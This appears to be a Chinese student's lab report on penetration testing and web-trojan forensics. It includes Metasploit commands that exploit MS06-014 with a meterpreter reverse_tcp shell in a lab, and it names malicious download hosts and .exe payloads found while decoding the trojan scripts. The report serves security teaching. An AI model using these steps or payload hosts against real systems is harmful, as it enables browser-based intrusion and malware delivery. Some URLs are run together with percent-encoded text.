20221920 2021-2022-2 《网络攻防实践》实践十一报告

20221920高翔 2023-05-23 19:42:59

1.实践内容

网络渗透

网络渗透是攻击者常用的一种攻击手段，也是一种综合的高级攻击技术，同时网络渗透也是安全工作者所研究的一个课题，在他们口中通常被称为”渗透测试（Penetration Test）”。
面对越来越多的网络攻击事件，网络管理员们采取了积极主动的应对措施，大大提高了网络的安全性。恶意的入侵者想要直接攻击一个安全防御到位的网络，看起来似乎是很困难的事情。于是，网络渗透攻击出现了。
对于大型的网络主机服务器群组，攻击者往往不会采取直接的攻击手段，而是采用一些迂回渐进式的攻击方法，长期而有计划地逐步渗透攻击进入网络，并完全控制整个网络，这就是”网络渗透攻击”。

木马

木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码，是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。木马病毒其实是计算机黑客用于远程控制计算机的程序，将控制程序寄生于被控制的计算机系统中，里应外合，对被感染木马病毒的计算机实施操作。一般的木马病毒程序主要是寻找计算机后门，伺机窃取被控计算机中的密码和重要文件等。可以对被控计算机实施监控、资料修改等非法操作。木马病毒具有很强的隐蔽性，可以根据黑客意图突然发起攻击。
计算机木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码，是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。
木马程序表面上是无害的，甚至对没有警戒的用户还颇有吸引力，它们经常隐藏在游戏或图形软件中，但它们却隐藏着恶意。这些表面上看似友善的程序运行后，就会进行一些非法的行动，如删除文件或对硬盘格式化。
完整的木马程序一般由两部分组成：一个是服务器端．一个是控制器端。“中了木马”就是指安装了木马的服务器端程序，若你的电脑被安装了服务器端程序，则拥有相应客户端的人就可以通过网络控制你的电脑。为所欲为。这时你电脑上的各种文件、程序，以及在你电脑上使用的账号、密码无安全可言了。

2.实践过程

（1）web浏览器渗透攻击
任务：使用攻击机和Windows靶机进行浏览器渗透攻击实验，体验网页木马构造及实施浏览器攻击的实际过程。
①选择使用Metasploit中的MS06-014渗透攻击模块

②选择PAYLOAD为任意远程Shell连接

③设置服务器地址和URL参数，运行exploit，构造出恶意网页木马脚本

④在靶机环境中启动浏览器，验证与服务器的连通性，并访问而已网页木马脚本URL

⑤在攻击机的Metasploit软件中查看渗透攻击状态，并通过成功渗透攻击后建立起的远程控制会话SESSION，在靶机上远程执行命令

攻击机：kali(192.168.200.11)
靶机：WinXP(192.168.200.3)
首先在kali中输入msfconsole,打开Metasploit.输入命令search MS06-014，搜索MS06-014渗透攻击模块

输入指令use exploit/windows/browser/ie_createobject，使用这个攻击机模块

使用命令 set LHOST 192.168.200.11 设置攻击机地址；使用命令 set payload windows/meterpreter/reverse_tcp 设定使用的载荷；使用命令 exploit 进行攻击.

攻击后会得到有木马的网址为http://192.168.200.11:8080/X5PfQFi7DUnm

攻击机显示攻击成功

在kali中输入sessions查看连接，并验证会话是否有效。输入指令"sessions -i 1"打开会话1。发现攻击机可以对靶机进行操作。

（2）取证分析实践—网页木马攻击场景分析
实践过程：
①首先你应该访问start.html，在这个文件中给出了new09.htm的地址，
②在进入 htm 后，每解密出一个文件地址，请对其作 32 位 MD5 散列，以散列值为文件名到
http://192.168.68.253/scom/hashed/
哈希值下去下载对应的文件(注意:文件名中的英文字母为小写，且没有扩展名)，即为解密出的地址对应的文件。
③如果解密出的地址给出的是网页或脚本文件，请继续解密。
④如果解密出的地址是二进制程序文件，请进行静态反汇编或动态调试。
⑤重复以上过程直到这些文件被全部分析完成。

首先打开start.html文件，对其中的代码进行分析，找到new09.html

可以看到在new09.html文件中，用iframe引用了一个http://aa.18dd.net/aa/kl.htm 文件，用js引用了一个http://js.users.51.la/1299644.js 文件

对http://aa.18dd.net/aa/kl.htm 作MD5的散列值，为：7F60672DCD6B5E90B6772545EE219BD3

对http://js.users.51.la/1299644.js%E4%BD%9CMD5%E7%9A%84%E6%95%A3%E5%88%97%E5%80%BC%EF%BC%8C%E4%B8%BA%EF%BC%9A23180A42A2FF1192150231B44FFDF3D3

打开提取出来的文件

观察文件内容发现，文件采用了XXTEA+Base64的加密方法，对于这种加密方案，我们需要找到他的密钥，在倒数第三行。

分析\x73\x63\x72\x69\x70\x74 就是密钥，用十六进制转换下

使用XXTEA在线加密解密工具进行解密。

将解密后的16进制部分转为字符串，得

通过分析文件我们可以看到文件里使用了“Adodb.Stream”（微软数据库访问对象）、“MPS.StormPlayer”（暴风影音）、POWERPLAYER.PowerPlayerCtrl.1”（PPStream）和“BaiduBar.Tool”（百度搜霸）外调函数漏洞
获取这四个漏洞对应的MD5散列值
http://aa.18dd.net/aa/1.js 的md5值为：5d7e9058a857aa2abee820d5473c5fa4

http://aa.18dd.net/aa/b.js 的md5值为：3870c28cc279d457746b3796a262f166

http://aa.18dd.net/aa/pps.js 的md5值为：5f0b8bf0385314dbe0e5ec95e6abedc2

http://down.18dd.net/bb/bd.cab 的md5值为： 1c1d7b3539a617517c49eee4120783b2

打开http://aa.18dd.net/aa/1.js%E5%AF%B9%E5%BA%94%E7%9A%84%E6%96%87%E4%BB%B6

将16进制转换到字符串，发现文件下载了014.exe文件

打开http://aa.18dd.net/aa/b.js 对应的文件

发现该文件使用packed加密，利用在线工具进行解密后得到，

通过分析解密后的代码可以发现使用了shellcode，下载了http://down.18dd.net/bb/bf.exe 文件

打开http://aa.18dd.net/aa/pps.js 对应的文件并对其进行解密，发现也是是使用了shellcode，下载了http://down.18dd.net/bb/pps.exe

对http://down.18dd.net/bb/pps.exe%E4%BD%9C%E6%95%A3%E5%88%97%E5%80%BC

压缩文件bd，打开为exe文件。将上述得到的四个文件.exe进行md5，发现其实是同一个文件,那随意分析一个即可。下面进行木马分析：使用IDA打开pps.exe

MD5(http://down.18dd.net/bb/014.exe,32) = ca4e4a1730b0f69a9b94393d9443b979
MD5(http://down.18dd.net/bb/bf.exe,32) = 268cbd59fbed235f6cf6b41b92b03f8e
MD5(http://down.18dd.net/bb/pps.exe,32) = ff59b3b8961f502289c1b4df8c37e2a4

在string window中发现了20个用于下载exe文件的链接。

将上述20个文件用杀毒软件进行扫描，发现显示发现病毒。

3）攻防对抗实践—web浏览器渗透攻击攻防

攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码，并进行混淆处理之后组装成一个URL，通过具有欺骗性的电子邮件发送给防守方。
防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态，并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。

和实验一一开始一样，重复实验一，得到木马网站http://192.168.200.11:8080/FVLyKr%EF%BC%8C%E5%9C%A8winXP%E4%B8%AD%E7%99%BB%E5%BD%95%E7%BD%91%E7%AB%99